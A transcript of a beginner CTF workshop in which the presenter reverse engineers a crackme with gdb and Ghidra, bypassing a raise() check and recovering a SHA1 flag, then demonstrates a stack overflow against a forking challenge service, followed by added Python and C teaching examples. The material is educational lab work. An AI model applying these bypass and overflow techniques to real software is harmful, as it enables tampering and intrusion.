and dynamic, because now in the binary it's a bit in the weeds, so if we go back in here, in the decompiler view on the right-hand side, we see this raise call. So what we're going to do is look at this function when we are running
it dynamically. So let's break on the main; we have symbols so we can just do b main and we will break. Then let's look at this in asm. We're going to quit this, start again, break on main, run, and we broke in main. Now we see the calls. So assembly basically is just a bunch of garbage in between important stuff. I know this is making it very simple, but to be 100% honest with you, I have no idea what this does. I know that they are function prologues and epilogues, and it's changing stuff that is important, that the compiler generates, but what I'm interested in is always between the calls and the stuff. Sometimes you need to understand what's this, especially if it's crypto or stuff like that, but in order to get into reverse engineering and not be afraid of everything, you just need to bite the bullet and accept that some of the stuff is just there and you need to plough through it. So ni is the command for next instruction; I think n could work in that context. You can see that we switched instruction. An important thing about low level like this, when you're close to the CPU, is that the CPU works with an instruction pointer. Basically this gets incremented, and it's a register, so it's a value that the CPU has, and whenever it executes, it gets incremented and it will run the next thing. But an instruction pointer can also be set via various means, including assembly when a call is made, but you could also assign it inside the debugger. So let's get closer to the raise. Okay, and you can see the instruction pointer: it just goes from the value that is here to the next one, linearly, predictably, and the size of the jump that is made depends on the length of the instruction, because x86 is a variable-length instruction set, so because of that it's not always predictable,
the address of the next thing. So we're in the call. The reason why we do next is we're going to jump over that call and not into the call; if you would like to jump into the call you would use si, step into, or step instruction actually, but stepping would get you into the call. So, call, and what's nice again with a plugin like this is that you get the arguments, right? So we see that we have this in a format string, on the stack in the case of this function, and it's this that is going to be printed, and if we run the instruction we can see that it was printed. Since we are debugging on the same output as the program is running, this mixes up the output like that, right? To avoid that, what you could do is attach to something being debugged running in a different terminal. Depending on what you're doing, these are all options that you could consider, and the more you do it the more familiar you will be with stuff like that. So now we are at dramatic. The arguments are put into the registers, and this is a convention that is followed by compilers and libraries; shellcode could avoid stuff like that. So dramatic was this long thing where the three dots get printed. Now let's move forward: compute, we don't know what it is, but it happens, and we wanted to get to the raise, right? So we're moving forward. Oh, now we see the call with "flag-", and here is "flag-", it was printed out, and now we're at the call to raise. Okay, and I told you earlier that if we set the instruction pointer we can change the state of the CPU and execute something else for this specific process. So let's jump over the call by setting rip to this address; let's see what it will do. set $rip = this address, boom, we avoided the raise, and now we can do c for continue, or we could step, you know, next instruction, and then we're moving forward. By the way, when you press enter, it's doing
the same command as your last input, so now I can just keep doing the command and we should get stuff out. So now it's doing a bunch of stuff, right, and if we take a look at the Ghidra output, after the raise there was this loop where characters would be printed in groups of two. So if you look at the format string definition, is it documented in the man pages? So again, this is the data I want; it's probably not the kernel thing, but... oh no, it's there, okay. So in section 3 there are all of the variants of printf, and basically you have all you need to look up what that zero means: zero means it should be padded, and x means that it will be converted to unsigned hex. So basically it's taking something binary, or not binary necessarily, a char pointer, and outputting it as hex. Now, when we are debugging, do we necessarily want to go through all of that? Well, I mean, we could, but one of the things that you'll notice as we get close to the print, the call to printf, is that the output, boom, is here, right? So the output is at the corner, so we'll have one character at a time, which is very annoying, so we should let go of the debugging, and to do so it's just c for continue, and so we get the rest of the string. So by skipping the raise we successfully printed the flag. Let's start over again, but this time... we chopped the beginning, right? So we're going to redo this but making sure we get the whole thing on one screen: breaking on main. Actually we could break on raise, so let's run it, r for run. So we're at main; yeah, so let's continue, it will break on raise. So, it broke in... okay, so that's not good advice because it broke in the libc raise, so we need to do that before we enter that stage, because it's too late otherwise. Or we could, but it would be complicated because we need the registers to be all sane. So break on main, and then we're going to step from main, continue or run, and then next
instruction, and then we run dramatic, compute, print, and then, up, okay, and then here we set rip to the instruction afterwards and we continue, and then we get the whole hex sequence. Now, we did see "flag-" being printed, so we probably don't have the whole thing, right? We need to append "flag-" before, and then boom, we are correct. Now let's see other ways we could have done this. You have to understand that raise is sending a signal, and when you run a program in a debugger you can trap signals; actually, by default, you trap signals. So another way to solve this, which is kind of uncool for me to show you at this time, is: you run it, it says that it received a signal, and you say yeah, sure, but continue, and then boom, it prints the flag. So you trapped the signal but you told the binary to continue executing and it printed the flag, and this is another way, by understanding how stuff is going on, that you can achieve your goal. The reason is that in Linux, or in Unix, an uncaught signal will terminate or will trash a program. Maybe it's not all signals; I mean, some signals are just handled by the kernel, the process is not even aware, but most signals are going to terminate a program, but in a debugger you can choose to continue or do whatever you want with it. Now, that was the dynamic approach. Now let's go and try to solve it in a static way instead. We can look around, right? We can dig into dramatic: if we double-click we see inside dramatic what we have is a little loop on param_1. What was param_1? If we go back, it's three, so there is a value of three that is given here, and when there are no references to a function, so it's called just once, and the other references are not code related, you can, if you want, basically rename a variable in a way that you will know what's the value, right? So it's a constant and it's three, so you
basically this is a "for 3", and it does a sleep 1 and then outputs 0x2e, which by now we know is a dot. But if we would like to make our decompiler listing prettier, we can't change the output type here; we need to go in the main view of Ghidra, but these are always in sync, right? You'll see: I click on sleep, I'm in front of sleep; putchar, in front of putchar. So I know that arguments will come before, because it's executed from the top down, and now this value, which by the way reuses the area that I labeled const_three, which makes this a little bit confusing, but this is what compilers do: they use the registers, and in this case it's a variable, and they use them aggressively if they know they don't have conflicts, so they do things like that. But here we can convert the type in the assembly to a char sequence, a dot, and it will be visible here. And it can happen here too: we have a 0xa, we can convert it to a char sequence, and now we have our return char. So we now know that "dramatic" is the dramatic function, and if you had taken the binary without the symbols you could do the same work, you could proceed exactly the same way, and you would label it; it might waste some time, or, you know, I like to use stuff like that, but it's the same labeling technique to understand what's going on when reversing. Okay, now getting to the interesting part: we have a variable here which is referenced here, which is printed as a sequence of hex, and it seems to be just an iterator. Right?
Going through the string. So this we can rename to i, and here, here, here, here. So okay, so lVar is... this is probably a char pointer, so we can retype the variable to that, and now we'll have an array access instead of the arithmetic that we had before, so it's more straightforward what's going on. The compute method now is casting, okay, so it means that this is just display; in compute is happening what we're interested in, so let's dive into it. Okay, so we got some mumbo jumbo, a lot of variables on the stack. You remember, local variables defined in the body of a function in C are going to be on the stack, in the CPU. So here they are, and this is a compiler optimization by the way; this is not how I wrote the challenge. The compiler said, oh, this is small enough, or, you know, used only locally, so I'm going to just put it that way, since we're on 64-bit; maybe on 32-bit it wouldn't have done the same. But it makes it a little bit more obscure, and IDA Pro shows it like boom, you have the string, you know exactly what's going on. I don't know what the optimization is called, but Ghidra doesn't have that optimization. Still, by looking we can see that these are values that are all around the printable ASCII range, right? This is based on experience; you will not know that, but eventually you'll have these reflexes. So 0x20 is a space, so you have a bunch of 0x20s; 0x73 is in the printable range, 0x54 as well, 0x6e as well. So we know that we could try to convert them. But first let's figure out: they all get assigned, and then the length is calculated, and then there's memory that is allocated, and then SHA1 of this, the beginning of the string, but using the address with the length that was previously calculated. So this probably means that it is the SHA1 of this, and then the result is going into that variable that was allocated with malloc, and then it's returning a pointer to that value. So we have
something like a SHA1 going on, and if we look at the API of SHA, again leveraging man pages, we would stumble upon the OpenSSL man pages, which have the signatures for these methods. Oh, I seem to be using a shortcut function here because there's no init, update and final, but md can be seen here and it's an unsigned char pointer. Oh no, SHA1 is here, it's here, okay: unsigned char pointer, the size, and then the destination. So again, if we want to do this in pure static fashion we need to extract that string, right? So we can try: this thing here we can try to convert the type and put it as a char sequence, but then we see it kind of backwards; the char sequence is "no way", "there is no way", so it's kind of upside down, right? I'm going to admit people. And then when we look at the decompiler view, it gets cast into an int when we do this, so Ghidra is clearly not helping us here. So what we're going to do instead, and this is where we combine dynamic and static, because I'm interested in doing the SHA computation statically, and depending on the challenge this could save you time, right? If there is a gatekeeping function that spins or that you can't skip, or anti-debugging in the way, you can jump into specific parts of the challenge, figure them out dynamically, then come back to static. So this is what we're going to do: we're going to break on compute and then we're going to stop here, so that we have the fully assembled string in our hands, right? Right here, rax should have a pointer to the full string. So let's look at this in gdb. Could we use the addresses in Ghidra's interface to pinpoint directly the address before the string line? I think it's possible, but as you can see in gdb they are prefixed with 5555, so... there might be... never mind. What's that? And the binary might have PIE enabled, so never mind, that won't work unless you have the correct
offset. Yeah, yes, exactly. So there are a couple of compiler settings and security features that could make this more difficult in this case, and, you know, I was not often able to map easily from, let's say, the hex view to the decompiler view to the dynamic gdb view, but I know that it's clearly feasible, right? I think here we would need to add, like, this, but is the rest zeros? And you can probably extract the base address from one of the info strings, and then add this value to the base address. So I think it could be done, but jumping directly to the spot is not that difficult, so I'm not going to bother, but it's a very good point. Okay, so we are in that function and we're going to just run. So the strings are getting moved, right? You see movabs in rax, and you see that rax has "there is" in the right byte ordering for us humans to understand, so "there is no way", and then "you are ever", you know, it's making sense, right, going on, and then when we are at the call, pouf: "there is no way you are ever going to figure this out". And so if we take this string and then echo it and hash it with sha1, this is the flag, right? You take this, add "flag-" at the beginning, and this is our flag. So we were able to do it by combining the approaches a little bit. And I looked today, trying to find if there was a stack string reconstructor, and I was pointed to the Script Manager, and there's a bunch of stuff here, but it seems that the stack string script is not part of that. But it's very interesting to know that there's so much scripting going on that could help, you know; now that I have a filter, so it's not there, and it seems all well classified. So Ghidra is really taking off and I think it's getting more and more powerful, and eventually I think this challenge is going to be a lot easier to solve in Ghidra. Are there...
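The static half of the solve above (stack string built from 64-bit immediates, the "printable ASCII" reflex, the bytes reading upside down in the listing, then SHA1 of the string with "flag-" in front), as an added Python example that is not the workshop's code and does not reproduce the crackme's real string. The secret, the immediates and the function names are constructed here; the hashing step assumes what the talk states, SHA1 over strlen bytes printed with %02x.

```python
"""Reassemble a stack string from movabs-style immediates and derive the flag from it."""
import hashlib
import struct
from typing import List


def immediates_for(secret: str) -> List[int]:
    """Emulate the compiler: NUL-terminate the string, pad to 8 bytes, and cut it into
    little-endian 64-bit chunks, which is what the listing shows as immediates."""
    raw = secret.encode("ascii") + b"\x00"
    raw += b"\x00" * (-len(raw) % 8)
    return [struct.unpack_from("<Q", raw, off)[0] for off in range(0, len(raw), 8)]


def looks_printable(imm: int) -> bool:
    """The reflex from the talk: every non-NUL byte of the immediate sits in 0x20..0x7e."""
    return all(b == 0 or 0x20 <= b <= 0x7E for b in struct.pack("<Q", imm))


def stack_string(imms: List[int]) -> str:
    """Inverse of immediates_for. Printing an immediate in hex shows the bytes reversed
    (the 'upside down' view in the decompiler); packing little-endian restores the order."""
    raw = b"".join(struct.pack("<Q", v) for v in imms)
    return raw.split(b"\x00", 1)[0].decode("ascii")


def flag_for(secret: str) -> str:
    """compute(): SHA1 over the string bytes, hex-encoded as %02x, prefixed with 'flag-'."""
    return "flag-" + hashlib.sha1(secret.encode("ascii")).hexdigest()


if __name__ == "__main__":
    imms = immediates_for("constructed secret")      # constructed, not the crackme's string
    for v in imms:
        print(f"movabs rax, {v:#018x}   printable={looks_printable(v)}")
    print(stack_string(imms))
    print(flag_for(stack_string(imms)))
```

On the constructed input the first immediate prints as 0x7465732064657473, i.e. "tes detc" read right to left, which is exactly why the char-sequence conversion in the listing looked backwards.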
I can take time for questions. I can do the bonus, I don't mind, but the bonus is clearly just another layer of complexity: we need to compile the project, we need to try to attack it, and so on, so it's more involved; not that much, but still. I would rather take questions now, if we have questions, and then move on to the binary. The scoreboard is exploding; oh, Eric has 12, so he figured out the binary. Okay, so I'm going to check questions. Okay, so the question is: can Ghidra be used to erase the raise call? It's possible to patch binaries with Ghidra, but I know that in 9.2 there was a bug where it wouldn't work; I don't know about 9.3, which is what I'm on right now, but I can explain to you the approach. The approach to patching out a call is to basically find where it is. So this is basically, if you look at the hex editor, this is what you have in there: this is the machine code. The machine code is translated by a disassembler into assembly language, which is meant for humans, and the assembly language is combined with its context to be decompiled into pseudo-C, which is even more meant for humans. So the idea of erasing this call would be to patch the instructions. "This processor received the rating of gold during testing; you should rarely encounter an error, but please let us know if you do." Okay, constructing assembler. Okay, so what I want to do here... oh, I want a patch, but not... I want to patch with machine code. Okay, now let's patch instruction, let's do that. Let's do nop. So nop basically is 0x90 and I will nop all the things. nop is "no operation", and basically this just says do nothing, and you need to nop everything, right, because nop is a one-byte instruction, and so if the CPU would execute that instruction it would move on to the next byte, and here you can see that the disassembler doesn't know, so it would crash here, and even the
decompiler just said "bad data". So you need to basically patch the whole sequence, boom, and so we don't have a raise call anymore. Let's try; now we need to extract that, save that out. Several nops in a row, when used in an exploitation context, are called a nop slide, and this is used when you jump somewhere but you're not sure where exactly, so you just put the slide so that eventually it's going to execute your shellcode. But so this looks like it's trying to export... no, "save crackme as", let's try that. I'm looking at where the stuff is; am I missing it? No, no, no. I should probably do something like export it: Export, okay, binary. As I said earlier, this used to be known buggy. Yeah, that's not going to work: it's not the same size at all; it needs to be an ELF, I guess. Okay, let's try again: Export Program, let's do ELF, not selection, everything... "failed to get relocation". Not looking good. I don't know how to do this, to be honest, so I think we're going to skip. If anyone knows... but the strategy is that one, right? And oh, what we could do, could we do something crazy like this? Basically, to be honest, what we could do is, let's say you search (not Google, search) the sequence of hex bytes that was there, the previous call, in a hex editor, and you replace it with 90s of the same length. You could probably run that and it should work. So, should I try, or should I move to the bonus? Anyone has input? I think the issue is Ghidra; I don't know how their exporting works, right? It's not just the file size, it's a completely different thing, it's not even close to the file size of the original binary, so it looks like it's reconstructing it and dropping a bunch of stuff. So someone says try, the other one says bonus... yeah, they want the bonus, okay, let's go with the bonus. Oh, and by the way, I think maybe once in a while
your screen glitches like you said it might okay should i do do something about it it's not really often i don't know you you seem to know how to fix it by moving between workspaces or something like that yeah yeah yeah i can try okay did never mind it's really uh viewable anyways no so i'll i'll have the guide rule in a separate screen but i'm gonna do a bunch of gdb so let's just close guide rule i think this gonna fix a half of it uh yes oh can i yeah relocation i don't know why does that i don't know i've never i haven't done this to be honest um okay up my bike i draw okay bonus the bonus uh so um the so it's a demon a program written in c that runs on the server if we look at it so it's a classic you know exploitation challenge here let's put us back in presentation just just for this quick net cap so we are gonna connect on this at this port and so it says please enter your serial number and we say nort sec is the best which is obviously the good serial number oh it says wrong serial number so that's the service now as is classic with exploitation challenges we uh runs on 1404 you get a sense of how old this thing is um but i mean it still applies and i i compiled it today on my arch and it's working and also yeah you'll you'll be able to solve it um and i think eric eric did uh two solves actually um so the source code is there and you get some context getting started so you know as is classic with crack me with où you have the source you need to break it locally because you can debug and then you eventually try your payload on the server so uh we're gonna download the source we should call them phone service and then uh it says here okay i need to create a service dot dot h otherwise it won't compile and this is you know a classic way or an old school way of decoupling the flag from the the source code so uh you uh you you basically input a false flag in your in the the program so let's go and do that service service dot h and then yay okay now back to the 
thing compile it with this and execute it with service so we compile it we get a couple of warnings but nothing is fatal so we should have uh binary we do so we can run it and uh we get a problem and uh if i do this oh no i was not great i think i'm the right thing okay oh i'm debugging it somewhere else let's kill that okay uh running service you know what so okay that's a good trick i'm gonna show you we know that this thing runs on port 12345 and i know it's confusing because on the server it's 2389 but this was changed to bypass uh outbound firewalls on arbitrary ports uh so i i kind of remap it using docker compose but uh but if you look at the source of the service file oops not the binary the source uh you can find where the socket is created so server address send port uh so this is c h host to uh it's packing basically this for the the socket structure and uh it's net network order something anyway this is the port uh and this is the address and this is a shorthand for zero zero zero zero zero so don't run this it's not super exploitable like it's kind of a more of a logic problem but it's still something you shouldn't run all the time like i was doing apparently um but anyway i'm behind net uh so uh with now that we know the port what we could do with uh when we are root on our system is list the the all of the services with uh so no net net network name resolution all the services and with the process and the process flag is the one that requires sudo so with this you'll find the uh the process that is still running so now i know that i need to kill this guy and it's probably the one i was trying to kill earlier actually no it was not so uh one thing to note of that and i think this is mentioned in the the challenge is it it uses a fork call so this makes gdb being confused quite easily so uh and and it creates the situation where the process is still running and you kill one and the other one's still there so basically anytime it receives a connection 
it forks itself and the child handles the connection so uh an old strategy very common back in the day and this this means debugging should be adjusted accordingly in order to follow the child which is given instructions there but also means that when you are in gdb when you kill your window the thing that the parent est still running so you need to do do then what i just did again to find it and kill it so and it's it's annoying but this these little details is what can make you not solve a challenge and it's nothing related to the challenge or super technical so this is kind of the intent of this is that you really need to understand a lot of what's going on in order to solve these challenges like these and these these demon doing fork calls challenges used to be very there used to be a lot of them back then um okay so moving from there we should be able to run the service and the server is ready so now let's take a poke at it let's put it us in presentation mode et voilà wrong serial number okay so we are set up to uh debug locally now i want we're gonna run this in gdb with the fancy uh output and we're gonna keep this here maybe a bit smaller and here we'll make it smaller too so gdb the service we're gonna run this guy and so we have a server ready but uh and if we connect are we debugging it's not clear okay so we need to figure out where we need to break and and and see from there what we can do so uh good place so basically okay so if we look at the things uh the it's listening all the time and when a connection is accepted it's forking into session the session method okay let's look at the session method this is the session method please enter your serial number succeeded or wrong number here so what we want to do is we want to make this go the other way right so from validate we want to switch to uh a true return to a false return but we will not be able to change the source code on this server so we need to do this locally without changing the source 
code but in order to understand what's going on debugging there is is going to be very interesting and important so let's start again gdb service let's break on validate and then run now oh can't bind address in use this is what i was talking about and i want you to take note that i did change set follow fork mode to child in my gdb environment so anytime there is a fork call i'm following the child not the parent because of the nature of what we're trying to debug here this is very important otherwise we'll be like hey my breakpoint never triggers and not don't understand why so this and let's kill again that listening service mine eight one it's gone are are they all gone yes okay let's start again now run uh no break on validate run okay and then connect uh uh uh uh or not let's have something better here okay thread hit where are we invalidate uh okay string copy at the bottom the rest we don't really understand and this is when you're like wait a minute but i have source code there's gotta be another way right how come i it's not prettier than this so aha you forgot when you compiled your program to add the gcc at the like this is not just symbols this is like the whole dwarf metadata stuff so that you can fully debug along with source code so this is you add dash j i know that in my notes or in the challenge notes i have dash j do i have nothing oh it's not there okay i did i i said nothing um so add dash j for debugging and uh if we do that we get the same warnings we get a larger binary and we need to kill the service uh probably i could do kill all but okay so what i just did i recompile service i added the dash j which means that all the bug information should be in it right i'm gonna still break invalidate i'm gonna run it and we're gonna compare notes with the previous time we ran it let's connect uh let's send this payload and so oh look at that we have source code instead of assembly oh my god so uh we okay array allocation string copy we can take a 
look at uh variable content so buff has this in it but it hasn't been allocated yet uh now it has this in it so value one okay so basically let's uh just jump quickly back into source code so validate we need it to return something we need it to return a true value and what it does is is that it compares value one with value two and if they are equal it will return a true value where is the bug where is the bug the bug is that it gets a char pointer at input okay that is not validated uh and it will inject a zero in it so that the string copy would stop eventually on the first copy but not on the second one and the second one is an input to another compute value but if you look at the way the stack is laid out so value one value two value uh buffer okay if you overwrite in buffer you will overwrite up so basically in this string copy here we can write up into value two and value one but the difficulty lies in that the fact that value two is computed after our string copy otherwise we could have just said a a a equals a a a and we would be done with it but the problem that this is done after it means that we need to try and do a lot of trial and errors in order to find the value of course uh more seasoned exploit people would probably have a way to solve this using uh anger or stuff like that right but this is CTF 101 let's not be ahead of ourselves we'll we'll do this by um looking iterating and try so first we need to do that overflow so let's we we're looking at buff and at value one and value two so content of value one is on the stack uh we should see it somewhere yeah how come the instruction pointer is not oh no i did uh no no no what should i do uh just next so i did an i for next instruction instead of next uh so this is why i was confused um okay so we have on the stack abcdfg and then this is the buff overflow uh now if we look at buff what do we have we have just garbage right because we didn't write enough characters so now this garbage is going to be 
sent to the compute function and now uh oops that's not and now we have uh binary compared to binary so no chance of winning here uh and and the everything is is smaller by the way and it's e instead of r because we're dealing with a 32 bit uh binary and uh crack me was a 64 bit uh one so uh here we're nowhere close to uh what we want to achieve so uh we're gonna continue and we're gonna try another one so let's go with this and the reason why i'm putting different characters is that you uh you you can see visually eventually where and give can give you an idea of what to change in the in the payload uh so ah damn it i i didn't do the i was distracted by the chat i'm gonna issue it again oops okay so i was close to the the size to do the overflow and so the program that the this child crashed and because of that i need to recycle the whole thing if i do kill all of service is that working yeah i think it's enough okay so breaking on validate and then running i see that i'm i'm running out of time but i just want to show might not get to the solution because i want to wrap up but don't want to take much of your time because you'll be in front of a computer for a long time uh this weekend for those who are playing ctf okay so uh next next next so what we have now we copied this over okay so we have here jklm comparing with nopq so something slightly flipped right and so eventually as you you try values on this you you uh you you you basically compute takes your input and shuffles it and the fact that the value is computed on top of both it means that every every time you change what you send you you shuffle around with the the what is done in compute and so it gets kind of of harder you're not necessarily getting closer and another important note is that you need to uh reverse the the because of the of the the way memory works right you need to send it backwards when you send it in the the command line so and uh otherwise it's not it's not gonna align but the i i i 
want to i i'm rushing a little bit because i want to get to the post uh uh the the post stuff but i i do want to show demonstrate to you a working payload so i'm i'm just gonna cheat a little bit and jump to the one that i know works and i still gonna struggle a bit with it but uh i think i'm gonna be close and we'll be able to debug it together oops so if i do that um next so it's it's too long i'm gonna make it shorter so i'm gonna uh reduce it by four i think you move more than four characters the beginning four three four okay yeah around this and then this this is it too long or too short that's what i'm wondering okay yeah yeah uh ah that's that's what messes with my head here we see the give me one sec okay i cheated i grabbed the a correct one that was debugging it okay let's start over i'm just gonna show you to kill this one kill restart break holiday connect is it running so we have the okay yeah there there's kind of a copy here of its own stuff to be honest i forgot the details but that is enough to get it uh to succeed and so basically the yay is my own stuff locally right and so now if we do that on ctf101.etc.io 3389 and then put that in we get uh stack corruption for the win so again this is not buffer well this is a buffer flow but it's not you're not changing the return address you are uh you are corrupting inside of the of the method so it's not uh it's it's not exploitation per say well it is because you overwrite a buffer but you don't you don't because there there is a stack canary uh oh no there's no there's no stack canary um so okay so there's no stack canary but but there is um if if you do the full exploit it's i think it's harder and more complicated than um then just just abusing this to override the value and i think the fact that you're dealing with a fork every time could have some implications also towards the full exploitation all this to say that i've never seen this exploited in a traditional way only exploited logically inside 
its own stack and someone better than me at sea could understand what compute is doing and then reverse it or or just use anger but but you know since it's over a network it's it's a it requires a bit of setup that is more involved than what i demonstrated today but but all this to say that there are again you know various ways to achieve exploitation of that challenge uh now let's put that in i i haven't validated that flag earlier so i'm not even sure if it's solvable oh that's not the good one sec but oh yeah it does work oh and er and eric had it before we had uh the other solves so yes all right um i i wanted to finish on uh and and i know we're late but that's the beauty of being the last workshop i can have you a couple extra minutes um i wanted to finish by talking about two things so again if you were familiar with any of the the techniques that i talked about today well this was city f101 so this was not you were not the intended audience but i hope that everyone learned at least one trick or two but but still like this is really the basics on how not to be intimidated by specific challenges this is in no way a a class on how to organize or how to acquire depth in specific sets of challenges in order to um to do to reach this these other skill sets uh what i recommend is that you look at other training exercises like montry hack uh or and and they were all partners of north sec mentioned here so ring zero team online um which has a ton of challenges in a great community that you can do at your own pace montry hack is more like what we did tonight we uh we go together through a challenge and there's more uh on your own type work it's not just presentation but it is you know a bit of the two we work together and there are our tables and people can talk to each other using discord and so on and uh lately all our videos have been uh uploaded on twitch oops i should actually put montry hack you know otherwise what's gonna be and so uh you can listen to a lot 
of the stuff that we did uh before um the you know malware analysis the hackfest ctf oh camel type stuff uh we have a lot of previous videos we will eventually um uh put them on on youtube as well i think uh but it's it's a lot of fun i think and and it's that depend on your learning style um and uh last thing i wanted to plug is we had where did i put this so the youtube of north sec we had a qna this week that have someone very interesting uh not someone something very interesting for people who want to develop the depth that we talked about uh a couple minutes ago where is where am i gonna find this i think this is the spot so i'm gonna share the link yes okay so that's the score but right here okay lana speaks about uh challenge design and there's nothing better than to be in the head of a designer but then afterwards the winners of last year's north sec one of the winners of last year's north sec david speaks about team organization so how did they delegate tasks how did they organize around in discord so this i'm gonna share the link to this with the the timestamp uh right now and i think so i i think that if this was really the one on one with a 201 or the way to uh regroup or approach uh ctf remotely is gonna be addressed more in these types of presentation in this presentation so i'm sharing it right now uh while i do so uh does anyone has any questions don't be shy but it's okay if you don't have i guess everything was clear or not but uh all right excellent and um i hope you you will have fun at the the ctf uh and thanks for being with us all that time it's a it's a it's a drag it's three hours of this is very intense so you're doing all already doing good steps towards having fun thanks everyone well thank you it was really interesting have a great night everyone
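The bonus-challenge walkthrough above describes a fixed buffer sitting just below two 32-bit locals, with an unbounded strcpy letting the input spill upward into them while value two is recomputed from the buffer afterwards. The following is an added example written for this page, not the challenge's source or the workshop's own code: it models that frame as a byte array so the spill stays defined C and can be checked, uses a stand-in compute() (FNV-1a, an assumption), a constructed sample serial, and assumed sizes and offsets (16-byte buffer, value2 at offset 16, value1 at offset 20). It pairs the vulnerable copy with a bounded version that rejects over-long input before touching the frame, and a check that reports whether a given input disturbed value1.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge's source. Models a stack frame in which a
 * fixed buffer sits just below two 32-bit locals, as the talk describes:
 * value1 is filled in before the copy, value2 is computed from buf after it.
 * Sizes and offsets are assumptions chosen for the model. */
#define BUF_SIZE   16
#define OFF_VALUE2 16
#define OFF_VALUE1 20
#define FRAME_SIZE 24

/* Constructed sample serial; the real challenge keeps its own in service.h. */
#define EXPECTED_SERIAL "EXAMPLE-SERIAL"

typedef struct { uint8_t bytes[FRAME_SIZE]; } frame_t;

/* Read/write a 32-bit local at a byte offset (endian-neutral via memcpy). */
static uint32_t load32(const frame_t *f, size_t off) {
    uint32_t v;
    memcpy(&v, f->bytes + off, sizeof v);
    return v;
}
static void store32(frame_t *f, size_t off, uint32_t v) {
    memcpy(f->bytes + off, &v, sizeof v);
}

/* Stand-in for the challenge's compute(): FNV-1a over n bytes (assumption). */
static uint32_t compute(const uint8_t *s, size_t n) {
    uint32_t h = 0x811c9dc5u;
    for (size_t i = 0; i < n; i++) {
        h ^= s[i];
        h *= 16777619u;
    }
    return h;
}

/* Length of the C string inside buf, capped at BUF_SIZE (like strnlen). */
static size_t buf_len(const frame_t *f) {
    size_t n = 0;
    while (n < BUF_SIZE && f->bytes[n] != 0) n++;
    return n;
}

static uint32_t reference_value(void) {
    return compute((const uint8_t *)EXPECTED_SERIAL, strlen(EXPECTED_SERIAL));
}

/* The vulnerable shape: strcpy(buf, input) with no length check. The copy is
 * clamped to the frame so this model stays defined C; the real program keeps
 * writing past the frame, which is the "stack corruption" seen in the talk. */
bool validate_unbounded(frame_t *f, const char *input) {
    store32(f, OFF_VALUE1, reference_value());   /* set before the copy */
    size_t n = strlen(input) + 1;                /* strcpy copies the NUL too */
    if (n > FRAME_SIZE) n = FRAME_SIZE;
    memcpy(f->bytes, input, n);                  /* spills into value2/value1 */
    store32(f, OFF_VALUE2, compute(f->bytes, buf_len(f)));  /* after the copy */
    return load32(f, OFF_VALUE1) == load32(f, OFF_VALUE2);
}

/* Hardened shape: reject anything that would not fit, before touching the
 * frame, so the input can never reach value1 or value2. */
bool validate_bounded(frame_t *f, const char *input) {
    size_t n = strlen(input);
    if (n >= BUF_SIZE) return false;             /* needs room for the NUL */
    store32(f, OFF_VALUE1, reference_value());
    memcpy(f->bytes, input, n + 1);
    store32(f, OFF_VALUE2, compute(f->bytes, n));
    return load32(f, OFF_VALUE1) == load32(f, OFF_VALUE2);
}

/* Convenience wrappers that run each validator on a fresh zeroed frame. */
bool bounded_accepts(const char *input) {
    frame_t f;
    memset(&f, 0, sizeof f);
    return validate_bounded(&f, input);
}
uint32_t value1_after_unbounded(const char *input) {
    frame_t f;
    memset(&f, 0, sizeof f);
    validate_unbounded(&f, input);
    return load32(&f, OFF_VALUE1);
}
/* True when the unbounded copy left value1 holding something other than the
 * reference hash: the corruption check, not a recipe for picking the input. */
bool clobbers_value1(const char *input) {
    return value1_after_unbounded(input) != reference_value();
}

int main(void) {
    /* Constructed inputs: the sample serial and a 24-byte filler that spans
     * buf (16 x 'A'), the value2 slot (4 x 'B') and the value1 slot (4 x 'C'). */
    const char *filler = "AAAAAAAAAAAAAAAABBBBCCCC";
    printf("bounded, correct serial -> %d\n", bounded_accepts(EXPECTED_SERIAL));
    printf("bounded, 24-byte input  -> %d\n", bounded_accepts(filler));
    printf("unbounded, 24-byte input clobbers value1 -> %d (value1 = 0x%08x)\n",
           clobbers_value1(filler), value1_after_unbounded(filler));
    return 0;
}
```

Compile with gcc -g as the talk recommends and step through validate_unbounded in gdb to watch the C bytes land in the value1 slot; the bounded variant never gets that far because the length check runs before any write.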